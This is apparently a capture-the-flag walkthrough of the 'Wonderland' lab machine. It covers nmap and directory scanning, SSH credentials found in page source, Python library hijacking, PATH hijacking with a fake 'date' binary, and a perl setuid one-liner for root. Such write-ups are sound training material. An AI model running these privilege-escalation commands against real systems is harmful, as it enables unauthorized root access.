Wonderland

March 12, 2024

Task 1: Capture the flags

# Nmap 7.94 scan initiated Tue Mar 12 13:50:35 2024 as: nmap -sC -sV -oN nmap -vv 10.10.166.115
Nmap scan report for 10.10.166.115
Host is up, received syn-ack (0.30s latency).
Scanned at 2024-03-12 13:50:36 PST for 56s
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 8e:ee:fb:96:ce:ad:70:dd:05:a9:3b:0d:b0:71:b8:63 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDe20sKMgKSMTnyRTmZhXPxn+xLggGUemXZLJDkaGAkZSMgwM3taNTc8OaEku7BvbOkqoIya4ZI8vLuNdMnESFfB22kMWfkoB0zKCSWzaiOjvdMBw559UkLCZ3bgwDY2RudNYq5YEwtqQMFgeRCC1/rO4h4Hl0YjLJufYOoIbK0EPaClcDPYjp+E1xpbn3kqKMhyWDvfZ2ltU1Et2MkhmtJ6TH2HA+eFdyMEQ5SqX6aASSXM7OoUHwJJmptyr2aNeUXiytv7uwWHkIqk3vVrZBXsyjW4ebxC3v0/Oqd73UWd5epuNbYbBNls06YZDVI8wyZ0eYGKwjtogg5+h82rnWN
|   256 7a:92:79:44:16:4f:20:43:50:a9:a8:47:e2:c2:be:84 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHH2gIouNdIhId0iND9UFQByJZcff2CXQ5Esgx1L96L50cYaArAW3A3YP3VDg4tePrpavcPJC2IDonroSEeGj6M=
|   256 00:0b:80:44:e6:3d:4b:69:47:92:2c:55:14:7e:2a:c9 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAsWAdr9g04J7Q8aeiWYg03WjPqGVS6aNf/LF+/hMyKh
80/tcp open  http    syn-ack Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Follow the white rabbit.
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Mar 12 13:51:32 2024 -- 1 IP address (1 host up) scanned in 57.45 seconds

As we can see from the nmap scan above, we can see the http service or port 80 is open so we can just visit it directly from our page and it shows like this.

There's nothing from the page or the source page is seems interesting

As we use the gobuster we can see some hidden subdirectory in the website

gobuster dir -u http://10.10.166.115/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster

By using the gobuster it doesnt go through the subdirectory that it has found and remain finding in that subdirectory. It just stops right after it found that directory

Therefore, I used the dirbuster tool since it gets the job done. We can see here the /r directory is actually the first letter for the word "rabbit"

And once we visited the site, we can see some interesting stuffs.

There is a credential that we found in the source page of the /r/a/b/b/i/t directory

alice:HowDothTheLittleCrocodileImproveHisShiningTail

And when we tried to log in to SSH service as alice user we can see here that it is a valid credential

ssh alice@10.10.166.115

Then we just used the sudo -l command to see the commands that we can run as alice.

The first one is a python file that returns some text.

Just view the python script itself and it reveal that it will import random library from the python and it will execute itself by using the user rabbit.

As we know that having a import in the code. The script will look first in the same directory where the "random" library might come. Then if it doesn't find any named as "random" python script, it will just look into the python root library as a result.

Therefore, we will create a python script or file that will import the /bin/bash file and it will be executed as that user

In simpler term, the code "import random" from the walrus_and_the_carpenter.py will look for the random file in the same directory and it will find our own newly created random.py that will execute /bin/bash. As we know that from sudo -l, it will be run as user rabbit.

import os

os.system("/bin/bash")

Therefore, as we can see below when we run the walrus_and_the_carpenter.py as the user rabbit, we will get the user rabbit.

sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py

ls
./teaParty

As we view here the "Probably by Tue, 12 Mar 2024 11:12:01 +0000" line is actually being provide by this line of code. "/bin/echo -n 'Probably by ' && date --date='next hour' -R"

Then we just have to create a executable file that have a similar name to date with the value of /bin/bash so that it will execute the /bin/bash as that user who owns the "teaParty" script.

vim date
cat date
chmod +x date

Then we just have to specify the directory where the malicious file date is located which is in our /tmp directory.

echo $PATH
export PATH=/tmp:$PATH
echo $PATH

Just run the teaParty script and it will look first for the malicious date script since we changed our $PATH environment to indicate that it will navigate first in the /tmp directory then execute that date file

WhyIsARavenLikeAWritingDesk?

As we use SSH to the user hatter with the password that we got. We will get a much stable connection to that user instead of just horizontal privilege

ssh hatter@10.10.116.120

Then we will just run linpeas asual and we will see we have some capabilities in the user hatter

cd /dev/shm
./linpeas.sh | tee peas.txt

We just look for a exploit for this perl executable in the GTFOBins.

And just execute to have a root access

/usr/bin/perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'